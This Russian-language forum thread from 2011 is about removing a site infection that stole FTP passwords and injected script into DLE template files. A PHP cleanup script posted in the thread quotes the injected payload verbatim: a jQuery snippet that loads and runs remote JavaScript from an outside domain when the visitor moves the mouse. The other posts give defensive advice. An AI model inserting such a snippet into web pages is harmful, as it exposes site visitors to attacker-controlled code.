Помогите избавиться от вируса на DLE

1. Переустановил винду.

2. Поменял пароли на ФТП.

3. Удалил внедренные строчки, почти вручную. Удалял появившиеся строчки во всех файлах, имеющих расширение .HTML .PHP и .JS

После всего этого появилась проблема... Неадекватное отображение некоторых сайтов во всех версиях IE/ Чем старее, тем хуже.

Где еще может оставаться в живых эта гадость?

Эта гадость везде почти, легче всего восстановить из бэкапа если он есть конечно и сменить ФТП, у меня все прошло без проблем !

тоже словил эту дрянь, пока сижу чищу руками... Заметил что прописывает код в файлы индкес.пхп индекс.хтмл и хедер.пхп. Движок как и говорили все равно какой и тырит именно пароли фтп. Причем у меня был коммандер.

как вариант можно в файрволе прописать чтобы на фтп можно было войти только с вашего IP

Поймали эту гадость, знакомый разработчик за 10 минут написал вот такой скрипт на PHP

Автор скрипта пожелал остаться инкогнито :)

<?php

define ('BR', "<br />\r\n");

$srch='<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(\'http://firefoxstabs.com/\' + Math.random().toString().substring(3) + \'.js\', function() {flag = 2;});}});});</script>';



function clean_file($file){

global $srch;

    $basename=basename($file);

    $filename=substr($basename, 0, strrpos($basename, '.'));

    if ($filename=='index' or $filename=='header' or $filename=='top' or $filename=='menu' or $filename=='footer' or $filename=='default') {

        $f_in=file_get_contents($file);

        if (strpos($f_in, $srch)!=false) {

            print($file.BR);

            $f_in=str_replace($srch, '', $f_in);

            file_put_contents($file, $f_in);

        }

    }

}



function firefoxtabs_remover($dir){

    if ($objs = glob($dir."/*")) {

        foreach($objs as $obj) {

            if (is_dir($obj)) firefoxtabs_remover($obj);

            else clean_file($obj);

        }

    }

}



$dir=realpath('./');

firefoxtabs_remover($dir);

?>

код ищет файлы от корня с именами

index

menu

header

top

footer

default

в них ищет вредоносный код и удаляет его

в итоге быстро удадлили весь "вредный код"

естетсвенно поменяли все пароли

Logik7 добавил 15.05.2011 в 09:49

модераторы ... переименуйте тему :)

этот вирус не для ДЛЕ - думаю более правильное название "Помогите избавиться от вируса firefoxtabs com"

Что то после чистки скриптом у меня отваливаются bbcodes и еще не могу залогинеться. Чистил кэш на сайте и в браузере. После чистки скриптом в админке автоматом переключается на функцию сжатие js файлов принудительно.

Короче, заипал этот вирус. Уже надоело перезаливать файлы. В ручную

alextrish добавил 16.05.2011 в 05:39

Сейчас пробежался по шаблонам, короче в шаблоне в папке js во всех файлах js появилось уже такое:

У меня на нескольких DLE сайтах тоже в JS появилось это говно, не могу выкорчевать где сидит, когда открываешь раздел меню Шаблоны сайта

Коллеги, вы удаляете лишь следствие, но не причину.

Злоумышленник, имея шелл на Вашем сайте/сервере, автоматизированно вносит изменения в код. Не чистить же раз в неделю свои скрипты?

Как минимум, можно убрать права на запись в шаблонах.

PS Чаще всего заражают main.tpl.

PPS Кто в этом плохо разбирается, можете обратиться ко мне, поможем избавиться (см.подпись).

Бред, main.tpl уже давно не в моде. У меня на хостинге 1 сайт и он заражен, шеллов нет ...

P.S. На мой взгляд проще всего времено заблокировать строчку, для этого надо выкачать все файлы и поиском заменить firefoxtabs на firefoxtabs_

Ок, отлично, временно заблокировал, все вычистил, разблокировал.

На следующее утро смотришь, а так опять firefoxtabs. И так каждый день. И что каждый день самому вручную чистить? Смысла не вижу. Надо искать дыры и следы злоумышленника, удалять их и уже потом чистить полностью сайт со всеми вытекающими сменами паролей FTP, MySQL, SSH, админов сайта.